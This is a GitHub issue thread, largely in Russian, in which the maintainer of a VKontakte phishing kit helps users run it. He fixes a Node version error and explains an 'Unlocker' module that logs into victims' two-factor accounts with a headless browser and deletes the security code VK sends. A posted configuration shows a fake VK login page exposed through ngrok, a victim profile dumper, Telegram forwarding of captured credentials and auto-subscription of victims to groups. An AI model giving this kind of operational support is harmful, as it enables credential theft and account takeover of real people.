### ISSUE TITLE
Error

### ISSUE THREAD

**Issue by kertis8763** [xxhax-team/vk-phishing#6]
sudo npm start
[sudo] пароль для ***********: 

> vk-phishing@2.0.0 start /home/***********/soft/vk-phishing
> node __sapper__/build

Starting server on port 3000
internal/modules/cjs/loader.js:638
    throw err;
    ^

Error: Cannot find module 'worker_threads'
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:636:15)
    at Function.Module._load (internal/modules/cjs/loader.js:562:25)
    at Module.require (internal/modules/cjs/loader.js:692:17)
    at require (internal/modules/cjs/helpers.js:25:18)
    at Object.<anonymous> (/home/**********/soft/vk-phishing/plugins/dumper/index.js:7:5)
    at Module._compile (internal/modules/cjs/loader.js:778:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:789:10)
    at Module.load (internal/modules/cjs/loader.js:653:32)
    at tryModuleLoad (internal/modules/cjs/loader.js:593:12)
    at Function.Module._load (internal/modules/cjs/loader.js:585:3)
npm ERR! code ELIFECYCLE
npm ERR! errno 1
npm ERR! vk-phishing@2.0.0 start: `node __sapper__/build`
npm ERR! Exit status 1
npm ERR! 
npm ERR! Failed at the vk-phishing@2.0.0 start script.
npm ERR! This is probably not a problem with npm. There is likely additional logging output above.

npm ERR! A complete log of this run can be found in:
npm ERR!     /root/.npm/_logs/2020-08-12T10_10_36_493Z-debug.log

What am I doing wrong?

**Comment by AlexXanderGrib** [comment]
Привет, у тебя старая nodejs, пожалуйста используй версию новее 12. 

Версию для windows можешь скачать с [офф. сайта nodejs](https://nodejs.org)

В Ubuntu напиши эту команду в терминале.
```bash
sudo apt install nodejs -y
```

Или ты можешь отключить дампер. Для этого в файле `config.yml` замени строчку

```yaml
dumper: true
```
На 
```yaml
dumper: false
```

**Comment by mihai9621** [comment]
Здравству я по другому вопросу кроме отображения в консоли где ещё сохраняется токен где удалить потому что когда хочу 2 раз входит смс не приходит в ВК все сессии закрываю в результате тоже самое вход идёт

**Comment by AlexXanderGrib** [comment]
> Здравству я по другому вопросу кроме отображения в консоли где ещё сохраняется токен где удалить потому что когда хочу 2 раз входит смс не приходит в ВК все сессии закрываю в результате тоже самое вход идёт

@mihai9621 Сорян, но я тебя не понял, повтори пожалуйста вопрос, но с запятыми

**Comment by mihai9621** [comment]
> > Здравству я по другому вопросу кроме отображения в консоли где ещё сохраняется токен где удалить потому что когда хочу 2 раз входит смс не приходит в ВК все сессии закрываю в результате тоже самое вход идёт
> 
> @mihai9621 Сорян, но я тебя не понял, повтори пожалуйста вопрос, но с запятыми

Работает всё хорошо но только как захочешь 2 раз смс не приходит а вот в ВК сессии что вход был показывает
![Screenshot_20201018-221936_Termux](https://user-images.githubusercontent.com/36726985/96377807-c26fc600-1190-11eb-900d-beafbb34ea05.jpg)
![Screenshot_20201018-222014_Chrome](https://user-images.githubusercontent.com/36726985/96377831-efbc7400-1190-11eb-81ed-5af1bc04658e.jpg)
![Screenshot_20201018-221949_VK](https://user-images.githubusercontent.com/36726985/96377839-ff3bbd00-1190-11eb-9114-5c3f71640580.jpg)

**Comment by AlexXanderGrib** [comment]
@mihai9621 У тебя скорее всего включён модуль Unlocker, который позволяет получать резервные коды от аккаунтов с 2-ух факторкой. Он входит через безголовый браузер и трёт код, пришешдший от администрации.

Так-как ты сидишь с Termux'a безголовый браузер не может запуститься, а код удаляется. Просто выключи этот модуль в конфиге:

```YAML
 unlocker: # Module for getting recovery codes for 2fs accounts
    removeAdminMessages: false 
    enabled: false
```

**Comment by mihai9621** [comment]
> @mihai9621 У тебя скорее всего включён модуль Unlocker, который позволяет получать резервные коды от аккаунтов с 2-ух факторкой. Он входит через безголовый браузер и трёт код, пришешдший от администрации.
> 
> Так-как ты сидишь с Termux'a безголовый браузер не может запуститься, а код удаляется. Просто выключи этот модуль в конфиге:
> 
> ```yaml
>  unlocker: # Module for getting recovery codes for 2fs accounts
>     removeAdminMessages: false 
>     enabled: false
> ```

C termux подключен по ssh к серверу я отключил модуль всё равно входит по логину и паролю а 2fa вкл я даже переустановил программу

**Comment by AlexXanderGrib** [comment]
@mihai9621 Скинь конфиг

**Comment by mihai9621** [comment]
> @mihai9621 Скинь конфиг

Да я в принципе ничего не менял 
`# Если ты не знаешь английский
# И нифига тут не понимаешь
# Вот https://github.com/xxhax-team/vk-phishing/blob/master/docs/ru.md
# По ссылке объясняется что тут к чему

title: Вход | ВКонтакте # Title of page, that will be visible to user
image: https://vk.com/images/brand/vk-logo.png # Same as title
exit: https://vk.com/im # User will go to this page after successful auth
port: 3000 # Port to server listen on
authUrl: /auth # Authorization server url, used by ajax requests on client
# exposePluginsConfigOnClient: false

plugins: # List of plugins & their settings
  dumper: true # Dumper of user profiles, set `true` for enable, `false` for disable
  ngrok: # Ngrok config, see https://ngrok.com/docs#config
    region: eu
    enabled: true
    ## if you have any
    ## you can also uncomment auth token field, for make link's life longer
    # authtoken:
  vkcc:
    tokens: [] # Default tokens for links shortening (can also be apps & groups)
    enabled: false

  telegram: # Module for send logs to telegram
    token: "111:xxxxx" # Telegram bot token, obtained from BotFather
    chatId: "@PazhiloyMoriarti" # Contact name, user id or chat id
    lang: en # Or ru, if you prefer russian
    successOnly: true # Set `false`, if you want receive unsuccessful messages
    enabled: false # Set `true` to enable

  auto-subscriber: # Module for automatically subscribe victims to some groups
    groups: # List of groups
      - 1 # Group can be number (id)
      - vk.com/xxhaxteam # or link
      - team # or screen name
      - "@dont_panic_42" # or @mention, but in ""
    timeout: 1000 # Timeout between subscriptions in milliseconds. 1000ms = 1s
    enabled: false

  unlocker: # Module for getting recovery codes for 2fs accounts
    removeAdminMessages: false # Removes messages with codes
    # Please set to actual token. Because sometimes when login captcha may be shown
    # You can get token here https://rucaptcha.com/for-customer
    ruCaptchaToken: 
    enabled: false
`

**Comment by AlexXanderGrib** [comment]
Я тут даже не знаю что ответить. Может просто не надо кучу раз входить с одного и того же аккаунта? ВК за такое блочить страницу может

**Comment by AlexXanderGrib** [comment]
Что-то долго issue висит и автор не активен. Если что не так, открывайте новые
